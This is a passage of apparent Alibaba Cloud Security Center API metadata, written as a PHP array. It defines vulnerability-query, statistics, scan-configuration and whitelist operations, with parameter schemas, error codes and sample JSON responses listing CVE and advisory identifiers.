\\"InstanceName\\": \\"testInstance\\",\\n \\"Online\\": true,\\n \\"OsVersion\\": \\"linux\\",\\n \\"Name\\": \\"oval:com.redhat.rhsa:def:20170574\\",\\n \\"Progress\\": 100,\\n \\"ResultCode\\": \\"0\\",\\n \\"InstanceId\\": \\"i-bp18t***\\",\\n \\"Related\\": \\"CVE-2017-7518,CVE-2017-12188\\",\\n \\"IntranetIp\\": \\"1.2.XX.XX\\",\\n \\"LastTs\\": 1620404763000,\\n \\"FirstTs\\": 1554189334000,\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"Necessity\\": \\"asap\\",\\n \\"RepairTs\\": 1541207563000,\\n \\"Uuid\\": \\"04c56617-23fc-43a5-ab9b-****\\",\\n \\"K8sPodName\\": \\"deployment-riskai-7b67d68975-m****\\",\\n \\"ContainerId\\": \\"04d20e98c8e2c93b7b864372084320a15a58c8671e53c972ce3a71d9c163****\\\\n\\",\\n \\"GroupId\\": 281801,\\n \\"ResultMessage\\": \\"timeout\\",\\n \\"K8sNamespace\\": \\"default\\",\\n \\"AliasName\\": \\"RHSA-2019:0230-Important: polkit security update\\",\\n \\"K8sNodeName\\": \\"deployment-riskai-7b67d68975-m****\\",\\n \\"ExtendContentJson\\": {\\n \\"Status\\": \\"1\\",\\n \\"EmgProof\\": \\"com.xxl.rpc.util.XxlRpcException: xxl-rpc request data is empty.\\\\\\\\n\\\\\\\\tat com.xxl.rpc.remoting.net.impl.servlet.serve\\\\\\"\\",\\n \\"Ip\\": \\"1.2.XX.XX\\",\\n \\"PrimaryId\\": 111,\\n \\"Os\\": \\"centos\\",\\n \\"Tag\\": \\"oval\\",\\n \\"LastTs\\": 1620404763000,\\n \\"Description\\": \\"kernel version:5.10.84-10.2.al8.x86_64\\",\\n \\"OsRelease\\": \\"7\\",\\n \\"AliasName\\": \\"RHSA-2019:0230-Important: polkit security update\\",\\n \\"Target\\": \\"http://39.99.XX.XX:30005/toLogin\\",\\n \\"AbsolutePath\\": \\"/roo/www/web\\",\\n \\"RpmEntityList\\": [\\n {\\n \\"FullVersion\\": \\"3.10.0-693.2.2.el7\\",\\n \\"Version\\": \\"3.10.0\\",\\n \\"MatchDetail\\": \\"python-perf version less than 0:3.10.0-693.21.1.el7\\",\\n \\"ImageName\\": \\"registry_387ytb_xxx\\",\\n \\"Path\\": \\"/usr/lib64/python2.7/site-packages\\",\\n \\"ContainerName\\": \\"k8s_67895c4_xxx\\",\\n \\"Name\\": \\"python-perf\\",\\n \\"UpdateCmd\\": \\"*** update python-perf\\",\\n \\"MatchList\\": [\\n \\"fastjson(jar) extendField.safemode equals false\\"\\n ],\\n \\"Pid\\": \\"8664\\",\\n \\"ExtendField\\": \\"{\\\\\\"msg_no_lookups_configured_CVE_2021_44228\\\\\\": \\\\\\"false\\\\\\", \\\\\\"jndi_class_not_exist\\\\\\": \\\\\\"false\\\\\\"}\\"\\n }\\n ],\\n \\"cveList\\": [\\n \\"CVE-2016-8610\\"\\n ],\\n \\"Necessity\\": {\\n \\"Status\\": \\"normal\\",\\n \\"Time_factor\\": \\"1.0\\",\\n \\"Enviroment_factor\\": \\"1.0\\",\\n \\"Is_calc\\": \\"1\\",\\n \\"Total_score\\": \\"7.8\\",\\n \\"Cvss_factor\\": \\"7.8\\",\\n \\"Assets_factor\\": \\"1\\"\\n }\\n },\\n \\"Bind\\": true,\\n \\"OsName\\": \\"CentOS 7.2 64位\\",\\n \\"AuthVersion\\": \\"3\\",\\n \\"RealRisk\\": true,\\n \\"RuleTag\\": \\"AI\\",\\n \\"Image\\": \\"registry-cn-**-vpc.ack.**.com/acs/ack-node-problem-detector:v0.8.16-8ed7053-**\\",\\n \\"Namespace\\": \\"kube-system\\"\\n }\\n ],\\n \\"NextToken\\": \\"E17B501887A2D3AA5E8360A6EFA3B***\\"\\n}","errorExample":""},{"type":"xml","example":"","errorExample":""}]', ], 'DescribeVulListPage' => [ 'summary' => 'Queries the vulnerabilities that can be detected.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '115807', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'CveId', 'in' => 'query', 'schema' => ['description' => 'The Common Vulnerabilities and Exposures (CVE) ID of the vulnerability.', 'type' => 'string', 'required' => false, 'example' => 'CVE-2022-44702', 'title' => ''], ], [ 'name' => 'VulNameLike', 'in' => 'query', 'schema' => ['description' => 'The name of the vulnerability.', 'type' => 'string', 'required' => false, 'example' => '远程代码执行漏洞', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'VulType', 'in' => 'query', 'schema' => ['description' => 'The type of the vulnerabilities. Valid values:'."\n" ."\n" .'- **cve**: Linux software vulnerability.'."\n" ."\n" .'- **sys**: Windows system vulnerability.'."\n" ."\n" .'- **app**: Application vulnerability that is detected by using web scanner.', 'type' => 'string', 'required' => false, 'example' => 'cve', 'title' => ''], ], [ 'name' => 'RaspDefend', 'in' => 'query', 'schema' => ['description' => 'Indicates whether the application protection feature is supported. Valid values:'."\n" ."\n" .'- **0**: no.'."\n" ."\n" .'- **1**: yes.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'title' => '', 'example' => '100'], 'RequestId' => ['description' => 'The ID of the request.', 'type' => 'string', 'example' => '4347E985-6E64-467B-96EC-30D4EA9E32FB', 'title' => ''], 'Data' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'array', 'items' => [ 'description' => 'Information about the vulnerability.', 'type' => 'object', 'properties' => [ 'ReleaseTime' => ['description' => 'The time when the vulnerability was disclosed.', 'type' => 'integer', 'format' => 'int64', 'title' => '', 'example' => '2022-12-13T08:00Z'], 'OtherId' => ['description' => 'The ID of the vulnerability.', 'type' => 'string', 'title' => '', 'example' => 'AVD-2018-8218'], 'IsSas' => ['description' => 'Indicates whether the vulnerability was detected based on proof of concept (POC) verification. Valid values:'."\n" ."\n" .'- 1: The vulnerability was detected based on POC verification.'."\n" ."\n" .'- 0: The vulnerability was not detected based on POC verification.', 'type' => 'integer', 'format' => 'int32', 'title' => '', 'example' => '0'], 'CveId' => ['title' => '', 'description' => 'The common vulnerabilities and exposures (CVE) ID of the vulnerability.', 'type' => 'string', 'example' => 'CVE-2022-42836'], 'Id' => ['title' => '', 'description' => 'The primary key ID of the database.', 'type' => 'integer', 'format' => 'int64', 'example' => '40586'], 'IsAegis' => ['description' => 'Indicates whether the vulnerability was detected based on version comparison. Valid values:'."\n" ."\n" .'- 1: The vulnerability was detected based on version comparison.'."\n" ."\n" .'- 0: The vulnerability was not detected based on version comparison.', 'type' => 'integer', 'format' => 'int32', 'title' => '', 'example' => '1'], 'Title' => ['description' => 'The name of the vulnerability.', 'type' => 'string', 'title' => '', 'example' => 'Windows 终端远程代码执行漏洞'], 'ExtAegis' => ['description' => 'The extended field for Server Guard.', 'type' => 'string', 'title' => '', 'example' => '{\\"relatedType\\":[{\\"type\\":\\"sys\\"}]}'], ], 'title' => '', 'example' => '', ], 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TotalCount\\": 100,\\n \\"RequestId\\": \\"4347E985-6E64-467B-96EC-30D4EA9E32FB\\",\\n \\"Data\\": [\\n {\\n \\"ReleaseTime\\": 0,\\n \\"OtherId\\": \\"AVD-2018-8218\\",\\n \\"IsSas\\": 0,\\n \\"CveId\\": \\"CVE-2022-42836\\",\\n \\"Id\\": 40586,\\n \\"IsAegis\\": 1,\\n \\"Title\\": \\"Windows 终端远程代码执行漏洞\\",\\n \\"ExtAegis\\": \\"{\\\\\\\\\\\\\\"relatedType\\\\\\\\\\\\\\":[{\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"sys\\\\\\\\\\\\\\"}]}\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeVulListPage', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulListPage'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeVulListPage', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeVulMetaCountStatistics' => [ 'summary' => 'Queries the statistics of vulnerabilities in Security Center.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '221237', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '571B2642-BF51-5BDD-906B-D2340DB9****', 'title' => ''], 'CveCount' => ['description' => 'The number of Linux software vulnerabilities.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'SysCount' => ['description' => 'The number of Windows system vulnerabilities.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'AppCount' => ['description' => 'The number of application vulnerabilities.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RaspDefendCount' => ['description' => 'The number of vulnerabilities that can be defended by the application protection feature.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"571B2642-BF51-5BDD-906B-D2340DB9****\\",\\n \\"CveCount\\": 10,\\n \\"SysCount\\": 10,\\n \\"AppCount\\": 0,\\n \\"RaspDefendCount\\": 10\\n}","type":"json"}]', 'title' => 'DescribeVulMetaCountStatistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulMetaCountStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeVulMetaCountStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeVulNumStatistics' => [ 'summary' => 'Get vulnerability statistics.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The request source.'."\n" .'* When querying Security Center data, set this parameter to **sas**.'."\n" .'* When querying Server Guard data, you do not need to set this parameter.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The member account ID in the resource directory (Alibaba Cloud account).'."\n" .'>You can call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '127608589417****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'AppNum' => ['description' => 'The number of application vulnerabilities detected by the scanner on your assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ScaNum' => ['description' => 'The number of middleware vulnerabilities on your assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'VulLaterSum' => ['description' => 'The number of vulnerabilities with a medium fix priority.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AppCnt' => ['description' => 'The number of application vulnerability entries detected by the scanner on your assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'CveNum' => ['description' => 'The number of Linux software vulnerabilities on your assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'EmgNum' => ['description' => 'The number of urgent vulnerabilities on your assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'CmsDealedTotalNum' => ['description' => 'The total number of handled CMS vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'VulDealedTotalNum' => ['description' => 'This field is deprecated.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'VulNntfSum' => ['description' => 'The number of vulnerabilities with a low fix priority.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'CmsNum' => ['description' => 'The number of Web-CMS vulnerabilities on your assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'E22C89D2-FE13-5800-8746-9D0EF1827A59', 'title' => ''], 'VulAsapSum' => ['description' => 'The number of vulnerabilities with a high fix priority.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'SysNum' => ['description' => 'The number of Windows system vulnerabilities on your assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'title' => 'Get vulnerability statistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulNumStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-aegis:DescribeVulNumStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"AppNum\\": 0,\\n \\"ScaNum\\": 0,\\n \\"VulLaterSum\\": 0,\\n \\"AppCnt\\": 0,\\n \\"CveNum\\": 0,\\n \\"EmgNum\\": 0,\\n \\"CmsDealedTotalNum\\": 0,\\n \\"VulDealedTotalNum\\": 0,\\n \\"VulNntfSum\\": 0,\\n \\"CmsNum\\": 0,\\n \\"RequestId\\": \\"E22C89D2-FE13-5800-8746-9D0EF1827A59\\",\\n \\"VulAsapSum\\": 0,\\n \\"SysNum\\": 0\\n}","type":"json"}]', ], 'DescribeVulTargetConfig' => [ 'summary' => 'Queries the configurations of the vulnerability scan feature for a server.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the vulnerability. Valid values:'."\n" ."\n" .'* **cve**: Linux software vulnerability'."\n" .'* **sys**: Windows system vulnerability'."\n" .'* **cms**: Web-CMS vulnerability'."\n" .'* **emg**: urgent vulnerability'."\n", 'type' => 'string', 'required' => false, 'example' => 'cve', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => 'ae1527a9-2308-46ab-b10a-48ae7ff7****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => '9FBC6E47-7508-58C9-9E76-528E118CB1CC', 'title' => ''], 'TargetConfigs' => [ 'description' => 'An array that consists of the configurations.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the configurations.'."\n", 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the vulnerability. Valid values:'."\n" ."\n" .'* **cve**: Linux software vulnerability'."\n" .'* **sys**: Windows system vulnerability'."\n" .'* **cms**: Web-CMS vulnerability'."\n" .'* **emg**: urgent vulnerability'."\n", 'type' => 'string', 'example' => 'cve', 'title' => ''], 'OverAllConfig' => ['description' => 'Indicates whether the vulnerability scan feature is enabled for all servers. Valid values:'."\n" ."\n" .'* **off**: disabled'."\n" .'* **on**: enabled'."\n", 'type' => 'string', 'example' => 'on', 'title' => ''], 'Config' => ['description' => 'Indicates whether the vulnerability scan feature is enabled for the server.'."\n" ."\n" .'* **off**: disabled'."\n" .'* **on**: enabled'."\n", 'type' => 'string', 'example' => 'on', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribeVulTargetConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulTargetConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeVulTargetConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TotalCount\\": 1,\\n \\"RequestId\\": \\"9FBC6E47-7508-58C9-9E76-528E118CB1CC\\",\\n \\"TargetConfigs\\": [\\n {\\n \\"Type\\": \\"cve\\",\\n \\"OverAllConfig\\": \\"on\\",\\n \\"Config\\": \\"on\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeVulTargetStatistics' => [ 'summary' => 'Retrieves the list of vulnerability switch configurations.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of vulnerability to query. Valid values:'."\n" ."\n" .'- **cve**: Linux software vulnerability'."\n" .'- **sys**: Windows system vulnerability'."\n" .'- **cms**: Web-CMS vulnerability'."\n" .'- **emg**: emergency vulnerability.', 'type' => 'string', 'required' => false, 'example' => 'cve', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page when paging is used in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '23AD0BD2-8771-5647-819E-6BA51E212F80', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page when paging is used in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'TargetStats' => [ 'description' => 'The statistics of vulnerability configurations.', 'type' => 'array', 'items' => [ 'description' => 'The vulnerability configuration statistics.', 'type' => 'object', 'properties' => [ 'VulType' => ['description' => 'The type of vulnerability to query. Valid values:'."\n" ."\n" .'- cve: Linux software vulnerability'."\n" .'- sys: Windows system vulnerability'."\n" .'- cms: Web-CMS vulnerability'."\n" .'- emg: emergency vulnerability.', 'type' => 'string', 'example' => 'cve', 'title' => ''], 'TotalCount' => ['description' => 'The total number of assets returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'UuidCount' => ['description' => 'The number of servers on which the configuration takes effect.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Targets' => [ 'description' => 'The list of target servers for the assets.', 'type' => 'array', 'items' => [ 'description' => 'The asset configuration information.', 'type' => 'object', 'properties' => [ 'Flag' => ['description' => 'The type of configuration effect. Valid values:'."\n" ."\n" .'- **add**: The configuration takes effect on the server.'."\n" .'- **del**: The configuration does not take effect on the server.', 'type' => 'string', 'example' => 'add', 'title' => ''], 'Target' => ['description' => 'The group ID or UUID of the asset on which the configuration takes effect.', 'type' => 'string', 'example' => '0011ea53-738c-4bff-93be-ce6a1cc9****', 'title' => ''], 'TargetType' => ['description' => 'The target type. Valid values:'."\n" ."\n" .'- **uuid**: asset.'."\n" .'- **groupId**: server group.', 'type' => 'string', 'example' => 'uuid', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve vulnerability switch configurations', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulTargetStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeVulTargetStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"RequestId\\": \\"23AD0BD2-8771-5647-819E-6BA51E212F80\\",\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 1,\\n \\"TargetStats\\": [\\n {\\n \\"VulType\\": \\"cve\\",\\n \\"TotalCount\\": 1,\\n \\"UuidCount\\": 1,\\n \\"Targets\\": [\\n {\\n \\"Flag\\": \\"add\\",\\n \\"Target\\": \\"0011ea53-738c-4bff-93be-ce6a1cc9****\\",\\n \\"TargetType\\": \\"uuid\\"\\n }\\n ]\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeVulWhitelist' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number in paging. Pages start from page 1. Default value: 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page in paging. Default value: 10.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '74F97EF7-B543-43FD-A4E9-18456731F9C5', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page in paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page in paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'VulWhitelists' => [ 'description' => 'The list of whitelisted vulnerabilities.', 'type' => 'array', 'items' => [ 'description' => 'The vulnerability information.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The vulnerability type.', 'type' => 'string', 'example' => 'cve', 'title' => ''], 'TargetInfo' => ['description' => 'The scope of the rule. The value is a JSON string that contains the following fields:'."\n" ."\n" .'- **type**: The applicable type. Valid values:'."\n" ."\n" .' - **Uuid**: host'."\n" .' - **GroupId**: group'."\n" ."\n" .'- **groupIds**: The IDs of the applicable asset groups.'."\n" .'- **uuids**: The UUIDs of the applicable assets.'."\n" ."\n" .'> If this value is empty, the rule applies to all assets.', 'type' => 'string', 'example' => '{"type":"GroupId","groupIds":[916****],"uuids":[]}', 'title' => ''], 'AliasName' => ['description' => 'The alias of the vulnerability.', 'type' => 'string', 'example' => 'RHSA-2017:3263: curl security update', 'title' => ''], 'Name' => ['description' => 'The name of the vulnerability.', 'type' => 'string', 'example' => 'oval:com.redhat.rhsa:def:20173263', 'title' => ''], 'Reason' => ['description' => 'The reason for adding the vulnerability to the whitelist.', 'type' => 'string', 'example' => 'ignore', 'title' => ''], 'Id' => ['description' => 'The rule ID.', 'type' => 'string', 'example' => '1275', 'title' => ''], 'Whitelist' => ['description' => 'The vulnerability information. The value is in JSON format.'."\n" ."\n" .'- **name**: The name of the vulnerability.'."\n" .'- **type**: The type of the vulnerability.'."\n" .'- **aliasName**: The alias of the vulnerability.', 'type' => 'string', 'example' => '[{'."\n" .'"name":"oval:com.redhat.rhsa:def:20173263",'."\n" .'"type":"cve",'."\n" .'"aliasName":"RHSA-2017:3263: curl security update"'."\n" .'}]', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query vulnerability whitelists by page', 'summary' => 'Queries vulnerability whitelists by paging.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulWhitelist'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeVulWhitelist', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'VulWhitelist', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:vulwhitelist/*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"RequestId\\": \\"74F97EF7-B543-43FD-A4E9-18456731F9C5\\",\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 1,\\n \\"Count\\": 2,\\n \\"VulWhitelists\\": [\\n {\\n \\"Type\\": \\"cve\\",\\n \\"TargetInfo\\": \\"{\\\\\\"type\\\\\\":\\\\\\"GroupId\\\\\\",\\\\\\"groupIds\\\\\\":[916****],\\\\\\"uuids\\\\\\":[]}\\",\\n \\"AliasName\\": \\"RHSA-2017:3263: curl security update\\",\\n \\"Name\\": \\"oval:com.redhat.rhsa:def:20173263\\",\\n \\"Reason\\": \\"ignore\\",\\n \\"Id\\": \\"1275\\",\\n \\"Whitelist\\": 